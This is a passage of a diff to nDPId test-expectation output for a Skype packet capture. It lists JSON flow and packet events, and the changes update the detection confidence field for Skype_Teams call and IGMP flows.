00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":2,"flow_last_seen":1431970671393,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970671393,"pkt":"0NQSxnP1PBXCt3IOCABFAABLhJoAAEARcpTAqAEiwKgBAdo6ADUAN4ffpXsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1023,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":2,"flow_last_seen":1431970671393,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970671393,"pkt":"0NQSxnP1PBXCt3IOCABFAABLdIYAAEARgqjAqAEiwKgBAe6nADUAN3lCuqsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1026,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1431970671951,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970671951,"pkt":"0NQSxnP1PBXCt3IOCABFAABArq9AAEAGEE\/AqAEib91KEshDnFkB\/oZbAAAAALAC\/\/94TQAAAgQFtAEDAwUBAQgKPjIXzQAAAAAEAgAA"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1431970671951,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970671951,"pkt":"0NQSxnP1PBXCt3IOCABFAABBmb4AAEARx3TAqAEiQAQXqzLdnF8ALTBge4UCLJNHDZxrWqKO2le\/27Ln4ZxRCYpxEOdXlle+BhpaiN\/trw=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1027,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1027,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1028,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1431970671951,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970671951,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1BfQAAEAR+PHAqAEib91KKzLdnEEAIUqfe4cCc5jQ2kkfJiYMRWMm+FrbQ2W3s3qD9w=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1028,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1028,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1029,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1431970671951,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970671951,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0IIEAAEAReCLAqAEiQTffFDLdnFcAIOS9e4kCJNSTA+Y3HirwjN7M3H9IWhw2zkeB"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1029,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1029,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1030,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970672329,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1431970672329,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":8,"thread_ts_msec":1431970672329,"pkt":"AQBeWbwBJKQ8\/kzXCABGwAAgAABAAAECfDnAqAHb6Vm8AZQEAAAWAESk6Vm8AQAAAAAAAAAAAAAAAAAA"} -00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1030,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970672329,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1030,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970672329,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":2,"flow_last_seen":1431970672330,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970672330,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGyAJv3UoSwKgBIpxZyEOVl6lyAf6GXKASOJAXYAAAAgQFrAQCCApNdqzUPjIXzQEDAwk="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1033,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":3,"flow_last_seen":1431970672330,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970672330,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0GgdAAEAGpQPAqAEib91KEshDnFkB\/oZclZepc4AQECxtDwAAAQEICj4yGUhNdqzU"} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1038,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":3,"flow_last_seen":1431970672443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970672443,"pkt":"0NQSxnP1PBXCt3IOCABFAABLqkkAAEARTOXAqAEiwKgBAdo6ADUAN4ffpXsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":3,"flow_last_seen":1431970672443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970672443,"pkt":"0NQSxnP1PBXCt3IOCABFAABLc8IAAEARg2zAqAEiwKgBAe6nADUAN3lCuqsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1431970672959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970672959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1S7cAAEARFafAqAEiQAQXjDLdnEMAIfDFe4sC3LQi2HlVtL\/yF355PoVbgc9yifdOBA=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1046,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1046,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1047,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1431970672959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970672959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+TFEAAEARFPLAqAEiQAQXnjLdnFUAKkRXe40CBN0haY4HfyNbFaIJe0md26M72eisE+NIO7kZgnvi7w=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1047,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1047,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1052,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673563,"flow_last_seen":1431970673563,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970673563,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1431970673563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970673563,"pkt":"0NQSxnP1PBXCt3IOCABFAABApWxAAEAGGZLAqAEib91KEshEAbuPHWWLAAAAALAC\/\/+gUwAAAgQFtAEDAwUBAQgKPjIeFQAAAAAEAgAA"} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":1431970673880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970673880,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGyAJv3UoSwKgBIgG7yEQiaEt4jx1ljKASOJAO\/AAAAgQFrAQCCApNdq5oPjIeFQEDAwk="} @@ -623,24 +623,24 @@ 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1431970673966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970673966,"pkt":"0NQSxnP1PBXCt3IOCABFAABAY6tAAEAGi8vAqAEi1cezr8hFnF3LCMFlAAAAALAC\/\/+c0QAAAgQFtAEDAwUBAQgKPjIfpgAAAAAEAgAA"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1059,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1059,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1431970673970,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970673970,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0vU0AAEARcr7AqAEinTfrqzLdnEYAIOCne48C+j3UCj6Khrhd65pIazZgrSV3BW0j"} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1059,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1059,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1060,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1060,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1431970673970,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970673970,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6zOQAAEARzB\/AqAEinTeCrTLdnEMAJgAFe5ECW1GQc626NgViJqEYKjead5HrxbDyRckYY2Mu"} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1060,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1060,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1061,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 